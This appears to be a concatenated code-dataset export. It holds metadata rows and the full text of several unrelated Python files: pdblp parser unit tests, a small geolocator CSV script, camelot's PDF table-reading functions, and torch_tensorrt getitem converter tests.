| 39.859431 | 138 | 0.628186 | 2,704 | 22,401 | 4.988905 | 0.057692 | 0.061675 | 0.0851 | 0.074129 | 0.91957 | 0.90252 | 0.895626 | 0.878206 | 0.865678 | 0.858858 | 0 | 0.010541 | 0.250391 | 22,401 | 561 | 139 | 39.930481 | 0.792818 | 0.118745 | 0 | 0.814458 | 0 | 0 | 0.02817 | 0.002854 | 0 | 0 | 0 | 0.001783 | 0.281928 | 1 | 0.06506 | false | 0 | 0.021687 | 0 | 0.108434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c4b5d418380d7c9d997e360a147aaa04bf185c48 | 20,886 | py | Python | pdblp/tests/test_parser.py | MosheVai/pdblp | 82819186c3d49d9daa94f0c59cdef75678106cac | [
"MIT"
] | null | null | null | pdblp/tests/test_parser.py | MosheVai/pdblp | 82819186c3d49d9daa94f0c59cdef75678106cac | [
"MIT"
] | null | null | null | pdblp/tests/test_parser.py | MosheVai/pdblp | 82819186c3d49d9daa94f0c59cdef75678106cac | [
"MIT"
] | null | null | null | import unittest
from pdblp import parser
class TestParser(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_historical_data_request_empty(self):
test_str = """
HistoricalDataRequest = {
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataRequest": {}}]
self.assertEqual(res, exp_res)
def test_historical_data_request_two_empty(self):
test_str = """
HistoricalDataRequest = {
}
HistoricalDataRequest = {
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataRequest": {}},
{"HistoricalDataRequest": {}}]
self.assertEqual(res, exp_res)
def test_historical_data_request_one_security_one_field_one_date(self):
test_str = """
HistoricalDataRequest = {
securities[] = {
"SPY US Equity"
}
fields[] = {
"PX_LAST"
}
startDate = "20150630"
endDate = "20150630"
overrides[] = {
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataRequest":
{"securities": ["SPY US Equity"],
"fields": ["PX_LAST"],
"startDate": "20150630",
"endDate": "20150630",
"overrides": []}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_one_security_one_field_one_date(self):
test_str = """
HistoricalDataResponse = {
securityData = {
security = "SPY US Equity"
eidData[] = {
}
sequenceNumber = 0
fieldExceptions[] = {
}
fieldData[] = {
fieldData = {
date = 2015-06-29
PX_LAST = 205.420000
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataResponse":
{"securityData":
{"security": "SPY US Equity",
"eidData": [],
"sequenceNumber": 0,
"fieldExceptions": [],
"fieldData": [{"fieldData": {"date": "2015-06-29", "PX_LAST": 205.42}}] # NOQA
}
}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_one_security_one_field_multi_date(self):
test_str = """
HistoricalDataResponse = {
securityData = {
security = "SPY US Equity"
eidData[] = {
}
sequenceNumber = 0
fieldExceptions[] = {
}
fieldData[] = {
fieldData = {
date = 2015-06-29
PX_LAST = 205.420000
}
fieldData = {
date = 2015-06-30
PX_LAST = 205.850000
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataResponse":
{"securityData":
{"security": "SPY US Equity",
"eidData": [],
"sequenceNumber": 0,
"fieldExceptions": [],
"fieldData": [{"fieldData": {"date": "2015-06-29", "PX_LAST": 205.42}}, # NOQA
{"fieldData": {"date": "2015-06-30", "PX_LAST": 205.85}}] # NOQA
}
}
}]
self.assertEqual(res, exp_res)
def test_historical_data_request_two_securities_one_field(self):
test_str = """
HistoricalDataRequest = {
securities[] = {
"SPY US Equity", "TLT US Equity"
}
fields[] = {
"PX_LAST"
}
startDate = "20150629"
endDate = "20150630"
overrides[] = {
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataRequest":
{"securities": ["SPY US Equity", "TLT US Equity"],
"fields": ["PX_LAST"],
"startDate": "20150629",
"endDate": "20150630",
"overrides": []}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_two_securities_one_field(self):
test_str = """
HistoricalDataResponse = {
securityData = {
security = "SPY US Equity"
eidData[] = {
}
sequenceNumber = 0
fieldExceptions[] = {
}
fieldData[] = {
fieldData = {
date = 2015-06-29
PX_LAST = 205.420000
}
fieldData = {
date = 2015-06-30
PX_LAST = 205.850000
}
}
}
}
HistoricalDataResponse = {
securityData = {
security = "TLT US Equity"
eidData[] = {
}
sequenceNumber = 1
fieldExceptions[] = {
}
fieldData[] = {
fieldData = {
date = 2015-06-29
PX_LAST = 118.280000
}
fieldData = {
date = 2015-06-30
PX_LAST = 117.460000
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [
{"HistoricalDataResponse":
{"securityData":
{"security": "SPY US Equity",
"eidData": [],
"sequenceNumber": 0,
"fieldExceptions": [],
"fieldData": [{"fieldData": {"date": "2015-06-29", "PX_LAST": 205.42}}, # NOQA
{"fieldData": {"date": "2015-06-30", "PX_LAST": 205.85}}] # NOQA
}
}
},
{"HistoricalDataResponse":
{"securityData":
{"security": "TLT US Equity",
"eidData": [],
"sequenceNumber": 1,
"fieldExceptions": [],
"fieldData": [{"fieldData": {"date": "2015-06-29", "PX_LAST": 118.28}}, # NOQA
{"fieldData": {"date": "2015-06-30", "PX_LAST": 117.46}}] # NOQA
}
}
}
]
self.assertEqual(res, exp_res)
def test_historical_data_request_one_security_two_fields(self):
test_str = """
HistoricalDataRequest = {
securities[] = {
"SPY US Equity"
}
fields[] = {
"PX_LAST", "VOLUME"
}
startDate = "20150629"
endDate = "20150630"
overrides[] = {
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataRequest":
{"securities": ["SPY US Equity"],
"fields": ["PX_LAST", "VOLUME"],
"startDate": "20150629",
"endDate": "20150630",
"overrides": []}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_one_security_two_fields(self):
test_str = """
HistoricalDataResponse = {
securityData = {
security = "SPY US Equity"
eidData[] = {
}
sequenceNumber = 0
fieldExceptions[] = {
}
fieldData[] = {
fieldData = {
date = 2015-06-29
PX_LAST = 205.420000
VOLUME = 202621332.000000
}
fieldData = {
date = 2015-06-30
PX_LAST = 205.850000
VOLUME = 182925106.000000
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataResponse":
{"securityData":
{"security": "SPY US Equity",
"eidData": [],
"sequenceNumber": 0,
"fieldExceptions": [],
"fieldData": [{"fieldData": {"date": "2015-06-29", "PX_LAST": 205.42, "VOLUME": 202621332}}, # NOQA
{"fieldData": {"date": "2015-06-30", "PX_LAST": 205.85, "VOLUME": 182925106}}] # NOQA
}
}
}]
self.assertEqual(res, exp_res)
def test_reference_data_request_override(self):
test_str = """
ReferenceDataRequest = {
securities[] = {
"AUD Curncy"
}
fields[] = {
"SETTLE_DT"
}
overrides[] = {
overrides = {
fieldId = "REFERENCE_DATE"
value = "20161010"
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"ReferenceDataRequest":
{"securities": ["AUD Curncy"],
"fields": ["SETTLE_DT"],
"overrides": [{"overrides": {"fieldId": "REFERENCE_DATE", "value": "20161010"}}] # NOQA
}
}]
self.assertEqual(res, exp_res)
def test_reference_data_response_override(self):
test_str = """
ReferenceDataResponse = {
securityData[] = {
securityData = {
security = "AUD Curncy"
eidData[] = {
}
fieldExceptions[] = {
}
sequenceNumber = 0
fieldData = {
SETTLE_DT = 2016-10-12
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"ReferenceDataResponse":
{"securityData":
[{"securityData":
{"security": "AUD Curncy",
"eidData": [],
"fieldExceptions": [],
"sequenceNumber": 0,
"fieldData": {"SETTLE_DT": "2016-10-12"}
}
}
]
}
}]
self.assertEqual(res, exp_res)
def test_reference_data_response_two_securities(self):
test_str = """
ReferenceDataResponse = {
securityData[] = {
securityData = {
security = "AUD Curncy"
eidData[] = {
}
fieldExceptions[] = {
}
sequenceNumber = 0
fieldData = {
SETTLE_DT = 2017-05-23
}
}
securityData = {
security = "CAD Curncy"
eidData[] = {
}
fieldExceptions[] = {
}
sequenceNumber = 1
fieldData = {
SETTLE_DT = 2017-05-23
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"ReferenceDataResponse":
{"securityData":
[{"securityData":
{"security": "AUD Curncy",
"eidData": [],
"fieldExceptions": [],
"sequenceNumber": 0,
"fieldData": {"SETTLE_DT": "2017-05-23"}
}
},
{"securityData":
{"security": "CAD Curncy",
"eidData": [],
"fieldExceptions": [],
"sequenceNumber": 1,
"fieldData": {"SETTLE_DT": "2017-05-23"}
}
}
]
}
}]
self.assertEqual(res, exp_res)
def test_reference_data_response_futures_chain(self):
test_str = """
ReferenceDataResponse = {
securityData[] = {
securityData = {
security = "CO1 Comdty"
eidData[] = {
}
fieldExceptions[] = {
}
sequenceNumber = 0
fieldData = {
FUT_CHAIN[] = {
FUT_CHAIN = {
Security Description = "CON7 Comdty"
}
FUT_CHAIN = {
Security Description = "COQ7 Comdty"
}
}
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"ReferenceDataResponse":
{"securityData":
[{"securityData":
{"security": "CO1 Comdty",
"eidData": [],
"fieldExceptions": [],
"sequenceNumber": 0,
"fieldData": {"FUT_CHAIN":
[{"FUT_CHAIN": {"Security Description": "CON7 Comdty"}}, # NOQA
{"FUT_CHAIN": {"Security Description": "COQ7 Comdty"}}] # NOQA
}
}
}
]
}
}]
self.assertEqual(res, exp_res)
def test_reference_data_response_time(self):
test_str = """
ReferenceDataResponse = {
securityData[] = {
securityData = {
security = "AUD Curncy"
eidData[] = {
}
fieldExceptions[] = {
}
sequenceNumber = 0
fieldData = {
TIME = "18:33:47"
LAST_PRICE_TIME_TODAY = 18:33:47.000
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"ReferenceDataResponse":
{"securityData":
[{"securityData":
{"security": "AUD Curncy",
"eidData": [],
"fieldExceptions": [],
"sequenceNumber": 0,
"fieldData": {"TIME": "18:33:47",
"LAST_PRICE_TIME_TODAY": "18:33:47.000"}
}
}
]
}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_invalid_date(self):
test_str = """
HistoricalDataResponse = {
responseError = {
source = "bbdbh4"
code = 31
category = "BAD_ARGS"
message = "Invalid end date specified [nid:247] "
subcategory = "INVALID_END_DATE"
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataResponse":
{"responseError": {"source": "bbdbh4",
"code": 31,
"category": "BAD_ARGS",
"message": "Invalid end date specified [nid:247] ", # NOQA
"subcategory": "INVALID_END_DATE"}
}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_invalid_security(self):
test_str = """
HistoricalDataResponse = {
securityData = {
security = "UNKNOWN Equity"
eidData[] = {
}
sequenceNumber = 0
securityError = {
source = "247::bbdbh2"
code = 15
category = "BAD_SEC"
message = "Unknown/Invalid securityInvalid Security [nid:247] "
subcategory = "INVALID_SECURITY"
}
fieldExceptions[] = {
}
fieldData[] = {
}
}
}
""" # NOQA
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataResponse":
{"securityData":
{"security": "UNKNOWN Equity",
"eidData": [],
"sequenceNumber": 0,
"securityError": {"source": "247::bbdbh2",
"code": 15,
"category": "BAD_SEC",
"message": "Unknown/Invalid securityInvalid Security [nid:247] ", # NOQA
"subcategory": "INVALID_SECURITY"},
"fieldExceptions": [],
"fieldData": []
}
}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_invalid_field(self):
test_str = """
HistoricalDataResponse = {
securityData = {
security = "SPY US Equity"
eidData[] = {
}
sequenceNumber = 0
fieldExceptions[] = {
fieldExceptions = {
fieldId = "UNKNOWN"
errorInfo = {
source = "247::bbdbh3"
code = 1
category = "BAD_FLD"
message = "Invalid field"
subcategory = "NOT_APPLICABLE_TO_HIST_DATA"
}
}
}
fieldData[] = {
fieldData = {
date = 2015-06-29
PX_LAST = 205.420000
}
fieldData = {
date = 2015-06-30
PX_LAST = 205.850000
}
}
}
}
""" # NOQA
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataResponse":
{"securityData":
{"security": "SPY US Equity",
"eidData": [],
"sequenceNumber": 0,
"fieldExceptions": [{"fieldExceptions":
{"fieldId": "UNKNOWN",
"errorInfo": {"source": "247::bbdbh3", # NOQA
"code": 1,
"category": "BAD_FLD",
"message": "Invalid field", # NOQA
"subcategory": "NOT_APPLICABLE_TO_HIST_DATA"} # NOQA
}
}],
"fieldData": [{"fieldData": {"date": "2015-06-29", "PX_LAST": 205.42}}, # NOQA
{"fieldData": {"date": "2015-06-30", "PX_LAST": 205.85}}] # NOQA
}
}
}]
self.assertEqual(res, exp_res)
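    # Usage sketch: the same entry point works outside the test harness;
    # feed raw Bloomberg response text to the parser and index into the
    # resulting list of nested dicts, e.g.:
    #
    #     out = parser.to_dict_list("HistoricalDataRequest = {\n}\n")
    #     out[0]["HistoricalDataRequest"]   # -> {}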
| 33.850891 | 133 | 0.363353 | 1,251 | 20,886 | 5.848122 | 0.107114 | 0.032531 | 0.051121 | 0.057135 | 0.957217 | 0.926873 | 0.90596 | 0.897348 | 0.876709 | 0.864954 | 0 | 0.065685 | 0.534952 | 20,886 | 616 | 134 | 33.905844 | 0.687532 | 0.004979 | 0 | 0.563478 | 0 | 0 | 0.56421 | 0.041908 | 0 | 0 | 0 | 0 | 0.029565 | 1 | 0.033043 | false | 0.003478 | 0.003478 | 0 | 0.038261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c4b6c76c44fc2dab58695cd7d3c7884b6ce02a69 | 179 | py | Python | matrix/geolocator/main.py | lsbloo/DMatrix | 226b4f2e927c3a6b32a266ad567918342b51f0de | [
"MIT"
] | null | null | null | matrix/geolocator/main.py | lsbloo/DMatrix | 226b4f2e927c3a6b32a266ad567918342b51f0de | [
"MIT"
] | null | null | null | matrix/geolocator/main.py | lsbloo/DMatrix | 226b4f2e927c3a6b32a266ad567918342b51f0de | [
"MIT"
] | null | null | null | from model import Address
from model import Locate
from reader.hcsv import generate_csv_address, reader_csv_address
#generate_csv_address(Address.get_all())
reader_csv_address()
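# Inferred two-step workflow (a sketch; the commented-out call above is step
# one, run once to build the CSV before it is read back):
#
#     generate_csv_address(Address.get_all())  # 1. dump addresses to CSV
#     reader_csv_address()                     # 2. parse them back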
| 22.375 | 63 | 0.854749 | 27 | 179 | 5.333333 | 0.407407 | 0.277778 | 0.208333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089385 | 179 | 7 | 64 | 25.571429 | 0.883436 | 0.217877 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
483b1813dda655bb08163d939b4d58cf6fc3d94e | 9,497 | py | Python | camelot/io.py | ilersich/camelot | ce9aeb158ebd4524d68c51c1848af0fff08d5ed8 | [
"MIT"
] | null | null | null | camelot/io.py | ilersich/camelot | ce9aeb158ebd4524d68c51c1848af0fff08d5ed8 | [
"MIT"
] | null | null | null | camelot/io.py | ilersich/camelot | ce9aeb158ebd4524d68c51c1848af0fff08d5ed8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import warnings
from .handlers import PDFHandler, PDFHandler_inMem
from .utils import validate_input, remove_extra
def read_pdf(
filepath,
pages="1",
password=None,
flavor="lattice",
suppress_stdout=False,
layout_kwargs={},
**kwargs
):
"""Read PDF and return extracted tables.
Note: kwargs annotated with ^ can only be used with flavor='stream'
and kwargs annotated with * can only be used with flavor='lattice'.
Parameters
----------
filepath : str
Filepath or URL of the PDF file.
pages : str, optional (default: '1')
Comma-separated page numbers.
Example: '1,3,4' or '1,4-end' or 'all'.
password : str, optional (default: None)
Password for decryption.
flavor : str (default: 'lattice')
The parsing method to use ('lattice' or 'stream').
Lattice is used by default.
    suppress_stdout : bool, optional (default: False)
        Suppress logs and warnings.
layout_kwargs : dict, optional (default: {})
A dict of `pdfminer.layout.LAParams <https://github.com/euske/pdfminer/blob/master/pdfminer/layout.py#L33>`_ kwargs.
table_areas : list, optional (default: None)
List of table area strings of the form x1,y1,x2,y2
where (x1, y1) -> left-top and (x2, y2) -> right-bottom
in PDF coordinate space.
columns^ : list, optional (default: None)
List of column x-coordinates strings where the coordinates
are comma-separated.
split_text : bool, optional (default: False)
Split text that spans across multiple cells.
flag_size : bool, optional (default: False)
Flag text based on font size. Useful to detect
super/subscripts. Adds <s></s> around flagged text.
strip_text : str, optional (default: '')
Characters that should be stripped from a string before
assigning it to a cell.
row_tol^ : int, optional (default: 2)
Tolerance parameter used to combine text vertically,
to generate rows.
column_tol^ : int, optional (default: 0)
Tolerance parameter used to combine text horizontally,
to generate columns.
process_background* : bool, optional (default: False)
Process background lines.
line_scale* : int, optional (default: 15)
Line size scaling factor. The larger the value the smaller
the detected lines. Making it very large will lead to text
being detected as lines.
copy_text* : list, optional (default: None)
{'h', 'v'}
Direction in which text in a spanning cell will be copied
over.
shift_text* : list, optional (default: ['l', 't'])
{'l', 'r', 't', 'b'}
Direction in which text in a spanning cell will flow.
line_tol* : int, optional (default: 2)
Tolerance parameter used to merge close vertical and horizontal
lines.
joint_tol* : int, optional (default: 2)
Tolerance parameter used to decide whether the detected lines
and points lie close to each other.
threshold_blocksize* : int, optional (default: 15)
Size of a pixel neighborhood that is used to calculate a
threshold value for the pixel: 3, 5, 7, and so on.
For more information, refer `OpenCV's adaptiveThreshold <https://docs.opencv.org/2.4/modules/imgproc/doc/miscellaneous_transformations.html#adaptivethreshold>`_.
threshold_constant* : int, optional (default: -2)
Constant subtracted from the mean or weighted mean.
Normally, it is positive but may be zero or negative as well.
For more information, refer `OpenCV's adaptiveThreshold <https://docs.opencv.org/2.4/modules/imgproc/doc/miscellaneous_transformations.html#adaptivethreshold>`_.
iterations* : int, optional (default: 0)
Number of times for erosion/dilation is applied.
For more information, refer `OpenCV's dilate <https://docs.opencv.org/2.4/modules/imgproc/doc/filtering.html#dilate>`_.
resolution* : int, optional (default: 300)
Resolution used for PDF to PNG conversion.
Returns
-------
tables : camelot.core.TableList
"""
if flavor not in ["lattice", "stream"]:
raise NotImplementedError(
"Unknown flavor specified." " Use either 'lattice' or 'stream'"
)
with warnings.catch_warnings():
if suppress_stdout:
warnings.simplefilter("ignore")
validate_input(kwargs, flavor=flavor)
p = PDFHandler(filepath, pages=pages, password=password)
kwargs = remove_extra(kwargs, flavor=flavor)
tables = p.parse(
flavor=flavor,
suppress_stdout=suppress_stdout,
layout_kwargs=layout_kwargs,
**kwargs
)
return tables
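# Usage sketch (the file name and keyword arguments are illustrative):
#
#     tables = read_pdf("report.pdf", pages="1-2", flavor="stream", row_tol=10)
#     tables[0].df  # each Table in the returned TableList exposes a DataFrame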
def read_pdf_inMem(
file,
pages="1",
password=None,
flavor="lattice",
suppress_stdout=False,
layout_kwargs={},
**kwargs
):
"""Read PDF and return extracted tables.
Note: kwargs annotated with ^ can only be used with flavor='stream'
and kwargs annotated with * can only be used with flavor='lattice'.
Parameters
----------
    file : file-like object
        The PDF file to read, supplied as an in-memory file-like object.
pages : str, optional (default: '1')
Comma-separated page numbers.
Example: '1,3,4' or '1,4-end' or 'all'.
password : str, optional (default: None)
Password for decryption.
flavor : str (default: 'lattice')
The parsing method to use ('lattice' or 'stream').
Lattice is used by default.
    suppress_stdout : bool, optional (default: False)
        Suppress logs and warnings.
layout_kwargs : dict, optional (default: {})
A dict of `pdfminer.layout.LAParams <https://github.com/euske/pdfminer/blob/master/pdfminer/layout.py#L33>`_ kwargs.
table_areas : list, optional (default: None)
List of table area strings of the form x1,y1,x2,y2
where (x1, y1) -> left-top and (x2, y2) -> right-bottom
in PDF coordinate space.
columns^ : list, optional (default: None)
        List of strings, each holding the comma-separated
        x-coordinates of the columns.
split_text : bool, optional (default: False)
Split text that spans across multiple cells.
flag_size : bool, optional (default: False)
Flag text based on font size. Useful to detect
super/subscripts. Adds <s></s> around flagged text.
strip_text : str, optional (default: '')
Characters that should be stripped from a string before
assigning it to a cell.
row_tol^ : int, optional (default: 2)
Tolerance parameter used to combine text vertically,
to generate rows.
column_tol^ : int, optional (default: 0)
Tolerance parameter used to combine text horizontally,
to generate columns.
process_background* : bool, optional (default: False)
Process background lines.
line_scale* : int, optional (default: 15)
        Line size scaling factor. The larger the value, the smaller
        the detected lines. Making it very large will lead to text
being detected as lines.
copy_text* : list, optional (default: None)
{'h', 'v'}
Direction in which text in a spanning cell will be copied
over.
shift_text* : list, optional (default: ['l', 't'])
{'l', 'r', 't', 'b'}
Direction in which text in a spanning cell will flow.
line_tol* : int, optional (default: 2)
Tolerance parameter used to merge close vertical and horizontal
lines.
joint_tol* : int, optional (default: 2)
Tolerance parameter used to decide whether the detected lines
and points lie close to each other.
threshold_blocksize* : int, optional (default: 15)
Size of a pixel neighborhood that is used to calculate a
threshold value for the pixel: 3, 5, 7, and so on.
        For more information, refer to `OpenCV's adaptiveThreshold <https://docs.opencv.org/2.4/modules/imgproc/doc/miscellaneous_transformations.html#adaptivethreshold>`_.
threshold_constant* : int, optional (default: -2)
Constant subtracted from the mean or weighted mean.
Normally, it is positive but may be zero or negative as well.
        For more information, refer to `OpenCV's adaptiveThreshold <https://docs.opencv.org/2.4/modules/imgproc/doc/miscellaneous_transformations.html#adaptivethreshold>`_.
iterations* : int, optional (default: 0)
        Number of times erosion/dilation is applied.
        For more information, refer to `OpenCV's dilate <https://docs.opencv.org/2.4/modules/imgproc/doc/filtering.html#dilate>`_.
resolution* : int, optional (default: 300)
Resolution used for PDF to PNG conversion.
Returns
-------
tables : camelot.core.TableList
"""
if flavor not in ["lattice", "stream"]:
raise NotImplementedError(
"Unknown flavor specified." " Use either 'lattice' or 'stream'"
)
with warnings.catch_warnings():
if suppress_stdout:
warnings.simplefilter("ignore")
validate_input(kwargs, flavor=flavor)
p = PDFHandler_inMem(file, pages=pages, password=password)
kwargs = remove_extra(kwargs, flavor=flavor)
tables = p.parse(
flavor=flavor,
suppress_stdout=suppress_stdout,
layout_kwargs=layout_kwargs,
**kwargs
)
return tables
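# A minimal usage sketch (assumptions: a local "tables.pdf" exists and this
# module is executed directly; per the signature above, read_pdf_inMem takes
# an open, in-memory file object instead of a filepath).
if __name__ == "__main__":
    with open("tables.pdf", "rb") as pdf_file:
        tables = read_pdf_inMem(pdf_file, pages="1", flavor="lattice")
        print(len(tables))  # number of tables detected on page 1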
| 40.759657 | 169 | 0.65526 | 1,200 | 9,497 | 5.126667 | 0.209167 | 0.102406 | 0.052666 | 0.027308 | 0.973992 | 0.973992 | 0.973992 | 0.973992 | 0.973992 | 0.973992 | 0 | 0.011127 | 0.252395 | 9,497 | 232 | 170 | 40.935345 | 0.855352 | 0.756239 | 0 | 0.763636 | 0 | 0 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036364 | false | 0.072727 | 0.054545 | 0 | 0.127273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
484d8d562220b8cf8f24c7917cd8ed565c492463 | 5,243 | py | Python | py/torch_tensorrt/fx/test/converters/acc_op/test_getitem.py | NVIDIA/Torch-TensorRT | 1a22204fecec690bc3c2a318dab4f57b98c57f05 | [
"BSD-3-Clause"
] | 430 | 2021-11-09T08:08:01.000Z | 2022-03-31T10:13:45.000Z | py/torch_tensorrt/fx/test/converters/acc_op/test_getitem.py | NVIDIA/Torch-TensorRT | 1a22204fecec690bc3c2a318dab4f57b98c57f05 | [
"BSD-3-Clause"
] | 257 | 2021-11-09T07:17:03.000Z | 2022-03-31T20:29:31.000Z | py/torch_tensorrt/fx/test/converters/acc_op/test_getitem.py | NVIDIA/Torch-TensorRT | 1a22204fecec690bc3c2a318dab4f57b98c57f05 | [
"BSD-3-Clause"
] | 68 | 2021-11-10T05:03:22.000Z | 2022-03-22T17:07:32.000Z | import torch
import torch.nn as nn
import torch_tensorrt.fx.tracer.acc_tracer.acc_ops as acc_ops
from parameterized import parameterized
from torch.testing._internal.common_utils import run_tests
from torch_tensorrt.fx.tools.common_fx2trt import AccTestCase, InputTensorSpec
class TestGetitemConverter(AccTestCase):
@parameterized.expand(
[
("slice_batch_dim", slice(None, None, None)),
("slice_basic", (slice(None, None, None), slice(0, 3, 2))),
("slice_full", (slice(None, None, None), slice(0, 10, 3))),
("ellipsis", (slice(None, None, None), ..., slice(0, 3, 2))),
(
"slice_all_none",
(slice(None, None, None), slice(None, None, None)),
),
(
"slice_start_none",
(slice(None, None, None), slice(None, 2, 1)),
),
("slice_end_none", (slice(None, None, None), slice(1, None, 1))),
(
"slice_step_none",
(slice(None, None, None), slice(0, 3, None)),
),
("slice_neg_idx", (slice(None, None, None), -1)),
("slice_neg_slice", (slice(None, None, None), slice(-8, -2, 3))),
("multi_dim", (slice(None, None, None), 0, 1)),
(
"slice_multi_dim",
(slice(None, None, None), slice(0, 3, 2), slice(1, -1, 3)),
),
(
"none",
(slice(None, None, None), None, slice(1, -1, 3), 1),
),
(
"slice_zero_slice",
(slice(None, None, None), slice(None, None, None), slice(0, 0, None)),
),
]
)
def test_getitem(self, _, idx):
class Getitem(nn.Module):
def __init__(self, idx):
super().__init__()
self.idx = idx
def forward(self, x):
x = x + x
return x[self.idx]
inputs = [torch.randn(2, 10, 10, 10)]
self.run_test(Getitem(idx), inputs, expected_ops={acc_ops.getitem})
@parameterized.expand(
[
("slice_batch_dim", slice(None, None, None)),
("ellipsis", (slice(None, None, None), ..., slice(0, -3, 2))),
(
"slice_all_none",
(slice(None, None, None), slice(None, None, None)),
),
(
"slice_end_none",
(slice(None, None, None), slice(None, None, None), slice(1, None, 1)),
),
(
"slice_step_none",
(slice(None, None, None), slice(None, None, None), slice(0, 3, None)),
),
("slice_neg_idx", (slice(None, None, None), -1, slice(None, None, None))),
(
"slice_neg_slice",
(slice(None, None, None), slice(None, None, None), slice(-8, -2, 3)),
),
("multi_dim", (slice(None, None, None), 0, 1)),
(
"slice_multi_dim",
(slice(None, None, None), slice(0, 3, 2), slice(1, -1, 3)),
),
(
"none",
(slice(None, None, None), None, slice(1, -1, 3)),
),
]
)
def test_getitem_with_dynamic_shape(self, _, idx):
class Getitem(nn.Module):
def __init__(self, idx):
super().__init__()
self.idx = idx
def forward(self, x):
x = x + x
return x[self.idx]
input_specs = [
InputTensorSpec(
shape=(-1, 256, 256),
dtype=torch.float32,
shape_ranges=[((1, 256, 256), (3, 256, 256), (5, 256, 256))],
),
]
self.run_test_with_dynamic_shape(
Getitem(idx), input_specs, expected_ops={acc_ops.getitem}
)
@parameterized.expand(
[
("slice_batch_dim", slice(None, None, None)),
("ellipsis", (slice(None, None, None), ..., slice(0, -3, 2))),
(
"slice_all_none",
(slice(None, None, None), slice(None, None, None)),
),
(
"slice_end_none",
(slice(None, None, None), slice(None, None, None), slice(1, None, 1)),
),
(
"slice_step_none",
(slice(None, None, None), slice(None, None, None), slice(0, 3, None)),
),
]
)
def test_getitem_with_multi_dynamic_shape(self, _, idx):
class Getitem(nn.Module):
def __init__(self, idx):
super().__init__()
self.idx = idx
def forward(self, x):
x = x + x
return x[self.idx]
input_specs = [
InputTensorSpec(
shape=(-1, -1, 256),
dtype=torch.float32,
shape_ranges=[((1, 128, 256), (3, 192, 256), (5, 256, 256))],
),
]
self.run_test_with_dynamic_shape(
Getitem(idx), input_specs, expected_ops={acc_ops.getitem}
)
if __name__ == "__main__":
run_tests()
| 34.045455 | 86 | 0.456418 | 562 | 5,243 | 4.044484 | 0.129893 | 0.281566 | 0.216454 | 0.291685 | 0.802904 | 0.797624 | 0.785306 | 0.743951 | 0.733392 | 0.698636 | 0 | 0.040566 | 0.393477 | 5,243 | 153 | 87 | 34.267974 | 0.674214 | 0 | 0 | 0.560284 | 0 | 0 | 0.070761 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06383 | false | 0 | 0.042553 | 0 | 0.156028 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
486ffa7196c710e898f79ad58a2522af5556cbf7 | 30,159 | py | Python | python/tests/step_test.py | maichmueller/Griddly | 25b978a08f13226de2831d0941af0f37fea12718 | [
"MIT"
] | 93 | 2020-05-29T14:36:46.000Z | 2022-03-28T02:58:04.000Z | python/tests/step_test.py | maichmueller/Griddly | 25b978a08f13226de2831d0941af0f37fea12718 | [
"MIT"
